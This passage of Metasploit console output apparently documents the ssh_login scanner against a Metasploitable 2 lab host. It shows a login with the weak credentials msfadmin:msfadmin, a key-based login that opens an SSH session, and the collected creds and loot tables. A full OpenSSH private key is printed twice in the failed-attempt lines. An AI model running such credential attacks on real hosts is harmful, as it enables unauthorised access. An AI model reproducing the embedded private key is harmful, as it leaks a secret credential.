10.0.0.10             Linux    Ubuntu     8.04   server

msf auxiliary(scanner/ssh/ssh_login) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    tcp   open                                          {}
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)

msf auxiliary(scanner/ssh/ssh_login) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                  References
---------                ----       -------       --------  ----                  ----------
2026-05-26 21:00:47 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH Weak Credentials  CVE-1999-0502,ATT&CK-T1021.004,ATT&CK-T1110.001

msf auxiliary(scanner/ssh/ssh_login) > creds
Credentials
===========

id   host       origin     service       public    private   realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------   -----  ------------  ----------  ----------------
575  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin         Password

msf auxiliary(scanner/ssh/ssh_login) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type       Data
 ----                     ----       -------  ----  --------  ----       ----
 2026-05-26 21:00:47 UTC  10.0.0.10  ssh      22    tcp       ssh.proof  {:credential=>"msfadmin:msfadmin", :id=>"uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audi
                                                                         o),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)", :uname=>"Linux metasploitable 2.6
                                                                         .24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux"}
 2026-05-26 21:00:47 UTC  10.0.0.10  tcp      22    tcp       ssh.cpe    {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}

msf auxiliary(scanner/ssh/ssh_login) >
```

```console
msf auxiliary(scanner/ssh/ssh_login) > run RHOST=10.0.0.10 KEY_PATH=/tmp/metasploitable2_key
[*] Starting SSH login sweep
[*] SSH - Testing key combinations
[*] Testing 1 key from /tmp/metasploitable2_key
[+] Success: 'msfadmin:SHA256:4Mfxk2ThtFyvDA3G5bEF28BiwJUqTs4bSZ6ZjLK+TF4' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)'
[+] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[*] SSH session 2 opened (10.0.0.1:40095 -> 10.0.0.10:22) at 2026-05-26 22:05:18 +0100
[-] Failed: 'kali:-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt9NdDr5EFdaTyo1QGLno6XxegrdH/+P9YM/Hp09Ld1HcPEADfSRr
wBL3XUFZZokfMWSvUoylEvNv61e1/DID7MVUUuCYD5PSnvpI9cOJB0T3j1JkiJi8I0VSeE
Kpfa/P9nUvepLjxpPM5ps4nDH8BWgorpYXTeYljaEXgVYBQRIbv2vkeElz4CvRZ9RBcvCV
N8X65/6nFu71zbJBaeRtHsh1bMDxfST2G7IRVhIsgtlwklDzsMm0XsnUiH0z48NN/isJIg
EqXFn+0MCfYSSO5joYdwgdSfkV7cJNgBjErwR4nGMi0s3plha8AfiuPZYb1qA0Vce4by4s
lU7hd8Q6iwAAA8jVmRkM1ZkZDAAAAAdzc2gtcnNhAAABAQC3010OvkQV1pPKjVAYuejpfF
6Ct0f/4/1gz8enT0t3Udw8QAN9JGvAEvddQVlmiR8xZK9SjKUS82/rV7X8MgPsxVRS4JgP
k9Ke+kj1w4kHRPePUmSImLwjRVJ4Qql9r8/2dS96kuPGk8zmmzicMfwFaCiulhdN5iWNoR
eBVgFBEhu/a+R4SXPgK9Fn1EFy8JU3xfrn/qcW7vXNskFp5G0eyHVswPF9JPYbshFWEiyC
2XCSUPOwybReydSIfTPjw03+KwkiASpcWf7QwJ9hJI7mOhh3CB1J+RXtwk2AGMSvBHicYy
LSzemWFrwB+K49lhvWoDRVx7hvLiyVTuF3xDqLAAAAAwEAAQAAAQAENc4S0V7D1UdLQ1NL
Ta688kFD4yi9/p3GAtxCw7kpwXE23Ax4aEYjfwu1UhLXG1rgibrOPDRnq7WrgTXE0exvFt
HomAZDjRIs2/Sh1FmmFflJigyNaFoewK6z3Gr/WvB7Z5Gvz/9xg98UhQeV5DsucIVGAmAE
Q7omdUMRjkO3FsYYlDT+0Tgvs1yxVQKFTlOIElpnoVvh503G9i5QL8cELZd83rUNYV1+OY
HPVQFrFB4dGSS6lp/T42/3AH/vhgsbuYbPPGd4PHVBMkzYaQmenC97gHbB+Z5PLRhbFscp
FYiHoKdgmc4769rtp5oTZVVUQUbyyNSZ+3wE+rqlrp9BAAAAgB9/SWii1nCtP6X8z0UqG+
euEoUNh69ESUi51YJ4Gqhx6SKbe0IQs9IVQR8dglMKbF60Ipx+IbpuABDG9iIgQgJbBA8U
DpPZAU80gkqjXMvUl1xQA+adu0UDckllwehUptytrhT3L3sJMg7UeJC3rJ+V5NeQolh0ir
HlF6+DBgfZAAAAgQDwcLzB2H6PTRik4AGcg5t/PKrBsg4pmIodhUOTYOThC2Bkp4r2tTfA
1csWU7hc/Plr028kGqeZuee8knanDqUg+eEa7/zz/CHB5fazFNpk8TVPEVJLnZ860wu3Nx
80eg902/Jdn2NdRE280RdrlKG4Vs+JBPyN8y3QlcJWitJToQAAAIEAw7i3ZPcUOuNP0t8y
WX8idZfdO0KZwwjZ5g1tnBB8ssyF+CHJsRZPTDJ1jpCfnABpR+gcrl/WTr7uvVKOfdHhhZ
LDReZsz8OqFWhkRC6iKgRm1sD3GLgOFPTzuY7g9gzt6tLUM6z9QHhQnLHl6UpmBhtBimNr
7ntN9e2vDt0JnqsAAAANa2FsaUBiZGVza3RvcAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
' (Incorrect: Authentication failed for user kali@10.0.0.10)
[-] Failed: 'incorrect:-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAt9NdDr5EFdaTyo1QGLno6XxegrdH/+P9YM/Hp09Ld1HcPEADfSRr
wBL3XUFZZokfMWSvUoylEvNv61e1/DID7MVUUuCYD5PSnvpI9cOJB0T3j1JkiJi8I0VSeE
Kpfa/P9nUvepLjxpPM5ps4nDH8BWgorpYXTeYljaEXgVYBQRIbv2vkeElz4CvRZ9RBcvCV
N8X65/6nFu71zbJBaeRtHsh1bMDxfST2G7IRVhIsgtlwklDzsMm0XsnUiH0z48NN/isJIg
EqXFn+0MCfYSSO5joYdwgdSfkV7cJNgBjErwR4nGMi0s3plha8AfiuPZYb1qA0Vce4by4s
lU7hd8Q6iwAAA8jVmRkM1ZkZDAAAAAdzc2gtcnNhAAABAQC3010OvkQV1pPKjVAYuejpfF
6Ct0f/4/1gz8enT0t3Udw8QAN9JGvAEvddQVlmiR8xZK9SjKUS82/rV7X8MgPsxVRS4JgP
k9Ke+kj1w4kHRPePUmSImLwjRVJ4Qql9r8/2dS96kuPGk8zmmzicMfwFaCiulhdN5iWNoR
eBVgFBEhu/a+R4SXPgK9Fn1EFy8JU3xfrn/qcW7vXNskFp5G0eyHVswPF9JPYbshFWEiyC
2XCSUPOwybReydSIfTPjw03+KwkiASpcWf7QwJ9hJI7mOhh3CB1J+RXtwk2AGMSvBHicYy
LSzemWFrwB+K49lhvWoDRVx7hvLiyVTuF3xDqLAAAAAwEAAQAAAQAENc4S0V7D1UdLQ1NL
Ta688kFD4yi9/p3GAtxCw7kpwXE23Ax4aEYjfwu1UhLXG1rgibrOPDRnq7WrgTXE0exvFt
HomAZDjRIs2/Sh1FmmFflJigyNaFoewK6z3Gr/WvB7Z5Gvz/9xg98UhQeV5DsucIVGAmAE
Q7omdUMRjkO3FsYYlDT+0Tgvs1yxVQKFTlOIElpnoVvh503G9i5QL8cELZd83rUNYV1+OY
HPVQFrFB4dGSS6lp/T42/3AH/vhgsbuYbPPGd4PHVBMkzYaQmenC97gHbB+Z5PLRhbFscp
FYiHoKdgmc4769rtp5oTZVVUQUbyyNSZ+3wE+rqlrp9BAAAAgB9/SWii1nCtP6X8z0UqG+
euEoUNh69ESUi51YJ4Gqhx6SKbe0IQs9IVQR8dglMKbF60Ipx+IbpuABDG9iIgQgJbBA8U
DpPZAU80gkqjXMvUl1xQA+adu0UDckllwehUptytrhT3L3sJMg7UeJC3rJ+V5NeQolh0ir
HlF6+DBgfZAAAAgQDwcLzB2H6PTRik4AGcg5t/PKrBsg4pmIodhUOTYOThC2Bkp4r2tTfA
1csWU7hc/Plr028kGqeZuee8knanDqUg+eEa7/zz/CHB5fazFNpk8TVPEVJLnZ860wu3Nx
80eg902/Jdn2NdRE280RdrlKG4Vs+JBPyN8y3QlcJWitJToQAAAIEAw7i3ZPcUOuNP0t8y
WX8idZfdO0KZwwjZ5g1tnBB8ssyF+CHJsRZPTDJ1jpCfnABpR+gcrl/WTr7uvVKOfdHhhZ
LDReZsz8OqFWhkRC6iKgRm1sD3GLgOFPTzuY7g9gzt6tLUM6z9QHhQnLHl6UpmBhtBimNr
7ntN9e2vDt0JnqsAAAANa2FsaUBiZGVza3RvcAECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
' (Incorrect: Authentication failed for user incorrect@10.0.0.10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      2      1      3

msf auxiliary(scanner/ssh/ssh_login) >
msf auxiliary(scanner/ssh/ssh_login) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf auxiliary(scanner/ssh/ssh_login) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    tcp   open                                          {}
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)

msf auxiliary(scanner/ssh/ssh_login) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                  References
---------                ----       -------       --------  ----                  ----------
2026-05-26 21:00:47 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH Weak Credentials  CVE-1999-0502,ATT&CK-T1021.004,ATT&CK-T1110.001

msf auxiliary(scanner/ssh/ssh_login) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
575  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin                                                Password
576  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  73:46:4c:e3:da:4f:0f:17:40:60:04:4c:5c:06:fb:ed         SSH key

msf auxiliary(scanner/ssh/ssh_login) > loot

Loot
====

host       service  type                                name                  content                   info                                                path
----       -------  ----                                ----                  -------                   ----                                                ----
10.0.0.10           host.unix.ssh.msfadmin_rsa_private  msfadmin_rsa.private  application/octet-stream  SHA256:4Mfxk2ThtFyvDA3G5bEF28BiwJUqTs4bSZ6ZjLK+TF4  /home/kali/.msf4/loot/20260526220517_default_10.0.0.10_host.unix.ssh.ms_762574.bin

msf auxiliary(scanner/ssh/ssh_login) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type       Data
 ----                     ----       -------  ----  --------  ----       ----
 2026-05-26 21:00:47 UTC  10.0.0.10  ssh      22    tcp       ssh.proof  {:credential=>"msfadmin:msfadmin", :id=>"uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audi
                                                                         o),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)", :uname=>"Linux metasploitable 2.6
                                                                         .24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux"}
 2026-05-26 21:00:47 UTC  10.0.0.10  tcp      22    tcp       ssh.cpe    {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}
 2026-05-26 21:05:17 UTC  10.0.0.10  tcp      22    tcp       ssh.proof  {:credential=>"msfadmin:SHA256:4Mfxk2ThtFyvDA3G5bEF28BiwJUqTs4bSZ6ZjLK+TF4", :id=>"uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm
                                                                         ),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msf
                                                                         admin)", :uname=>"Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux"}

msf auxiliary(scanner/ssh/ssh_login) >
```